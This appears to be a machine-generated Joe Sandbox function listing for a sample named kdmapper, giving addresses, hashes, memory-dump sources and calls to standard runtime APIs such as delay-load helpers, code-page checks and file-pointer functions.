Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 6db26f44ac68ec145484b6382fad194c7ecec6cb3cfccb43397bc3105a65e652
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 6db26f44ac68ec145484b6382fad194c7ecec6cb3cfccb43397bc3105a65e652
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E2CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 86719b9c4a7f1b7e4a5febdcbd38afb68aab8fa6b96b8c51d36f6cd6913eb073
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 86719b9c4a7f1b7e4a5febdcbd38afb68aab8fa6b96b8c51d36f6cd6913eb073
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E2D7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: d179e93af2843dcb233d3d654345475c325dd3e917c71f0ba1dcb052e3862462
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: d179e93af2843dcb233d3d654345475c325dd3e917c71f0ba1dcb052e3862462
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E2A5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 8977ba257f8b494f23ca48ec8734b445b30ef38779ede05546fcdcc5a9b2cf9e
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 8977ba257f8b494f23ca48ec8734b445b30ef38779ede05546fcdcc5a9b2cf9e
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E2AF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 4b99427fbb954ce3f37f440fc66b6d9f91b5df141e89341b2260d21db59717ab
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 4b99427fbb954ce3f37f440fc66b6d9f91b5df141e89341b2260d21db59717ab
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E2B9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: db610d2573560c0ecdd4ed7a2efea20afd03ec1574daefbbd50f6dcdd9a311f0
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: db610d2573560c0ecdd4ed7a2efea20afd03ec1574daefbbd50f6dcdd9a311f0
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E291 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 72fbc538cdbf1b07d44ae459bde923f0f76b28726a5926d388d59d669a5d6493
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 72fbc538cdbf1b07d44ae459bde923f0f76b28726a5926d388d59d669a5d6493
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E29B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

c, xrefs: 0063E1DD

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: c
API String ID: 1269201914-1230825448
Opcode ID: 58087c8907fe1672bdf1d4befae10936b1fc0482989504b7c753ed55a4796339
Instruction ID: 3be5dd8d7705b5c4a8ebc162d2ac828d0e2d5c1f93b187b5f510358cbb957646
Opcode Fuzzy Hash: 58087c8907fe1672bdf1d4befae10936b1fc0482989504b7c753ed55a4796339
Instruction Fuzzy Hash: A2A001EA6A9242FC714862926D06C3B021FC8C5B66B31896EFC17C44C1A8A2685A18B5

Function 0063E569 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

(c, xrefs: 0063E519

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c
API String ID: 1269201914-4066220940
Opcode ID: 37e73def70b4a1baf9415127e69e11f9f3a3849fcee598d2e43fde630c6a4169
Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
Opcode Fuzzy Hash: 37e73def70b4a1baf9415127e69e11f9f3a3849fcee598d2e43fde630c6a4169
Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0

Function 0063E573 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E580

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

F0wnc, xrefs: 0063E57A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: F0wnc
API String ID: 1269201914-3598844980
Opcode ID: 5ee0ac6d781d391d120b470c907c0862c2627b231441cbbdd65a2d6d342dc6f4
Instruction ID: 44cb1fbbcd176af803b07b345964d5acaa0b62ee02abb538cd03141ba70ee32f
Opcode Fuzzy Hash: 5ee0ac6d781d391d120b470c907c0862c2627b231441cbbdd65a2d6d342dc6f4
Instruction Fuzzy Hash: F4A011C2AA8200BC300822A02C02C3B020FC0C2B3AB32822EF802800C0A8820A0A08B0

Function 0063E541 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

(c, xrefs: 0063E519

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c
API String ID: 1269201914-4066220940
Opcode ID: 764b99e8185b1e1b1ae8ef8b08c87b3bfbffbb0fb46f897fc289423e42cbc81b
Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
Opcode Fuzzy Hash: 764b99e8185b1e1b1ae8ef8b08c87b3bfbffbb0fb46f897fc289423e42cbc81b
Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0

Function 0063E555 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

(c, xrefs: 0063E519

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c
API String ID: 1269201914-4066220940
Opcode ID: 0d7b5da8d7329c53d5995a10304e850ff93d73fc61e2983f693f16203a7e1235
Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
Opcode Fuzzy Hash: 0d7b5da8d7329c53d5995a10304e850ff93d73fc61e2983f693f16203a7e1235
Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0

Function 0063E55F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E51F

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

(c, xrefs: 0063E519

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: (c
API String ID: 1269201914-4066220940
Opcode ID: 33cefe8bce223f9a85c1f52b483b14a54ebe1458ed8be7ad172fed8bd4c846b6
Instruction ID: dd3c3c356355a896e78d1c60713c5afb06c77b6d5e433b480f44decfcc91c50c
Opcode Fuzzy Hash: 33cefe8bce223f9a85c1f52b483b14a54ebe1458ed8be7ad172fed8bd4c846b6
Instruction Fuzzy Hash: E4A011C2AA8A02BC300822802C02C3B020FC0C2F3AB30882EF802800C0A8820C8A08B0

Function 0063E5A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E580

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

F0wnc, xrefs: 0063E57A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: F0wnc
API String ID: 1269201914-3598844980
Opcode ID: 03226dffed809b503bfcd7f2056f2ff8918a7f7ece78ecb78dd8acbeadec5c1e
Instruction ID: 75fc5f411fcf7f140b345cbd270efa376af2f1246bf61b6d090c9afbbe075317
Opcode Fuzzy Hash: 03226dffed809b503bfcd7f2056f2ff8918a7f7ece78ecb78dd8acbeadec5c1e
Instruction Fuzzy Hash: 6AA011C2AA8202BC300822A02C02C3B020FC0C2B3AB32882EF802800C0A882080A08B0

Function 0063E58E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0063E580

Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1

Strings

F0wnc, xrefs: 0063E57A

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: F0wnc
API String ID: 1269201914-3598844980
Opcode ID: b6222eed6f21f29f968fe2efc321ec38224e3da24c0aaed3a17e6548ef5536c9
Instruction ID: 75fc5f411fcf7f140b345cbd270efa376af2f1246bf61b6d090c9afbbe075317
Opcode Fuzzy Hash: b6222eed6f21f29f968fe2efc321ec38224e3da24c0aaed3a17e6548ef5536c9
Instruction Fuzzy Hash: 6AA011C2AA8202BC300822A02C02C3B020FC0C2B3AB32882EF802800C0A882080A08B0

Function 0064BBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 0064B7BB: GetOEMCP.KERNEL32(00000000,?,?,0064BA44,?), ref: 0064B7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0064BA89,?,00000000), ref: 0064BC64
GetCPInfo.KERNEL32(00000000,0064BA89,?,?,?,0064BA89,?,00000000), ref: 0064BC77

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: f2ae3dfd2f3be7837ad5ff7df35b889fec35ee0bf87ad56fb6215226d2745948
Instruction ID: a3849fd590fdf781115c4dd3d86fe6392f111009235eec4298de45f9136d7a9d
Opcode Fuzzy Hash: f2ae3dfd2f3be7837ad5ff7df35b889fec35ee0bf87ad56fb6215226d2745948
Instruction Fuzzy Hash: 8B51F070E042459EDB249F75C8816FABBE7EF41300F1864AED4968B362D735DA46CB90

Function 00629A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00629A50,?,?,00000000,?,?,00628CBC,?), ref: 00629BAB
GetLastError.KERNEL32(?,00000000,00628411,-00009570,00000000,000007F3), ref: 00629BB6

Memory Dump Source

Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true

Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: b3e67096d03d478f74e2120afee76bf43eb6ffbab474a60d9c1a46fabde62dd9
Instruction ID: c442703e9ebad3b05659aaf31a9f2bafba467c57370be1cdb045260e1a693718
Opcode Fuzzy Hash: b3e67096d03d478f74e2120afee76bf43eb6ffbab474a60d9c1a46fabde62dd9
Instruction Fuzzy Hash: 4841AC31904B218BDB24DF15F5844ABB7E7FBD4712F148A2DE891833A0D770AD458EB1

